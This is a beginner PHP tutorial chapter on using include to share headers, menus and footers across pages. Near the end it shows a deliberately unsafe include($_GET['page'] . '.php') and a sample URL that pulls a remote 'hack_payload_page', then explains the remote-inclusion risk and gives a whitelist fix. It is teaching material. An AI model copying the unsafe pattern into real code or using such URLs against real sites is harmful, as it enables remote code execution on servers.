SITERAW

Including Pages with PHP

Have you ever wanted to update the menu on your website and realized you had to manually edit the HTML code on every single page? That's because the menu, or header, usually appears on all pages... so chances are you copy-pasted the same block of code over and over again. Sure it works. But let's be honest, it's a pain.

One of PHP's simplest and most helpful features is the ability to include pages. With just a tiny line of code, you can embed an entire page — or just a chunk of one — into another. This can save you loads of time and effort by sparing you from having to duplicate the same HTML code across multiple files.

In this chapter, you're going to discover one of the many perks PHP brings to the table when building your site.

The Concept of Inclusion

Most websites follow a fairly standard layout (and yes, I'm shamelessly reusing this diagram from my HTML & CSS course):

   [Header]
[Menu] [Content]
   [Footer]

Even this very site, SiteRaw.com, is no exception to the rule, as you've probably noticed. 😉

The Problem

Up until now, you've probably been stuck copying the same three sections onto every page:

  • The header
  • The menu
  • The footer

That means your code ends up bloated and repetitive, copy-pasted onto every single page!

Every page on your site likely includes the same header, menu, and footer... because usually, only the content in the middle changes.

The Solution

With PHP, you can easily insert other pages (or just parts of them) into your main page.

The concept is actually pretty straightforward. Let's say your website has 25 pages, and each one includes the same exact menu. Instead of pasting that menu into all 25 files, why not just write it once — in a file called menu.php, for example?

Then, with PHP, you can include menu.php in all your other pages. And if you ever need to change your menu, you'll only have to update one file — menu.php — and the change will automatically appear across your whole site.

The include Function

We're going to focus on one function here: include. It's simple to use, frequently used, and super powerful.

So what does it do?

It lets you include the content of one PHP file into another. Super handy, right?

Let's say your site has a menu on the left side that appears on every page. Previously, you'd have to copy and paste that menu into all your pages. And if you wanted to update the menu? You'd have to go back and edit each page manually. Ugh.

With include, you're telling PHP, "Hey, drop the contents of menu.php right here." PHP will then grab the contents of that file and insert it at the exact spot where you called it.

So now, if you need to change the menu, all you do is update menu.php. Voilà! All your site's pages update automatically. Honestly, it's this exact feature that convinced me to learn PHP in the first place. It blew my mind.

Here's how you include the menu.php file:

<?php
include("menu.php");
?>

That's it. Super simple. PHP sees the include statement, fetches the file menu.php, and pops its contents in right there.

The menu.php file can contain anything you like:

<div id="menu">        
   <div class="element">
       <h3>Menu title</h3>
       <ul>
           <li><a href="page1.html">Link</a></li>
           <li><a href="page2.html">Link</a></li>
           <li><a href="page3.html">Link</a></li>
       </ul>
   </div>    
</div>

You can do the same with a header.php file or a footer.php file if your site needs them.

But wait... menu.php doesn't contain any PHP code — is that okay?

Totally. A file ending in .php doesn't have to contain PHP code (even if that's rare). In this case, it's essentially just a regular HTML file that PHP serves without modification. That said, you can put PHP code in menu.php — and if you do, it'll be executed before the final page is sent to the browser.

Page Inclusion Example

Let's walk through a quick example.

We'll create three files:

  • header.php
  • footer.php
  • index.php

The index.php page will include the other two. Here's what it looks like:

<?php include("header.php"); ?>
<p>Welcome to my index page! This is my website, nice huh?</p>
<?php include("footer.php"); ?>

Now, header.php might contain:

<h1>Welcome to SiteRaw</h1>

And footer.php:

<p>This is the end...</p>

When you visit index.php, you'll see something like this on the page:

Welcome to SiteRaw
Welcome to my index page! This is my website, nice huh?
This is the end...

What happened?

index.php included the contents of header.php (above the main text) and footer.php (below). After PHP processes the page, the final HTML output looks like this:

<h1>Welcome to SiteRaw</h1>
<p>Welcome to my index page! This is my website, nice huh?</p>
<p>This is the end...</p>

That's the power of include! If you ever want to change the header text ("Welcome to SiteRaw"), you only need to do it once — in header.php — instead of editing every page on your site.

PHP Include Best Practices

So far, we've seen the classic approach: include header.php and footer.php in every page:

  • index.php
  • news.php
  • forum.php
  • contact.php
  • ...and so on.

But what if we flipped the script? What if we had one page — let's call it include.php — that contains the header and footer, and we just change the "middle" content?

Totally doable. Just use PHP's $_GET variable to pass the page name via the URL.

$_GET is a special array (a superglobal, to be precise) that holds the values passed in the URL after the question mark.

For example: include.php?page=SiteRaw ... would give you: $_GET['page'] = 'SiteRaw'.

Here's what that might look like in code:

<!DOCTYPE html>
<html>
    <head>
        <title>Welcome to SiteRaw.</title>
    </head>
    <body>
    <?php
    $page = $_GET['page']; // Don't use this yet  —  hang tight
    include($page . '.php'); // Danger! We'll talk about why...
    ?>    
    <p>Welcome to SiteRaw.</p>
    </body>
</html>

  • If the URL is index.php?page=index, it includes index.php
  • If it's index.php?page=news, it includes news.php
  • If it's index.php?page=forum, it includes forum.php
  • If it's index.php?page=https://www.siteraw.com/hack_payload_page... then it includes...

Uh... wait a sec, can you explain that last one? 😳

Yes. This needs a little unpacking.

Look at the URL bar — you can freely change the page name. That means, with the current code, anyone could tell PHP to include any file they want — even from a different website!

For example, PHP could end up executing this:

<?php include("https://www.siteraw.com/hack_payload_page"); ?>

Why's that a problem?

Well, if I host a malicious PHP file on my own server and get your site to include it, your server ends up executing my code.

That's what we call an include vulnerability, and it's seriously dangerous. You could end up running untrusted, third-party code on your site. Not good.

The golden rule? NTUI: Never Trust User Input.

The simplest fix is to create an array of authorized page names and always check that the requested page is on that list.

Here's how:

<?php
$authorized_pages = array('index', 'news', 'forum', 'siteraw_worship');
if (in_array($_GET['page'], $authorized_pages)) {
    include($_GET['page'] . '.php');
} else {
    die('Fatal Error!');
}
?>

(And if you're not sure how in_array works, check out the chapter on arrays!)

That's it! Now you know everything you need about includes. It's not rocket science, but it can make your website a whole lot easier to manage. 🎉

How to Build a Website in HTML and CSS

Enjoyed this PHP & MySQL course?

If you liked this lesson, you can find the book "How to Build a Website in HTML and CSS" from the same authors, available on SiteRaw, in bookstores and in online libraries in either digital or paperback format. You will find a complete PHP & MySQL workshop with many exclusive bonus chapters.

More information

< Summary >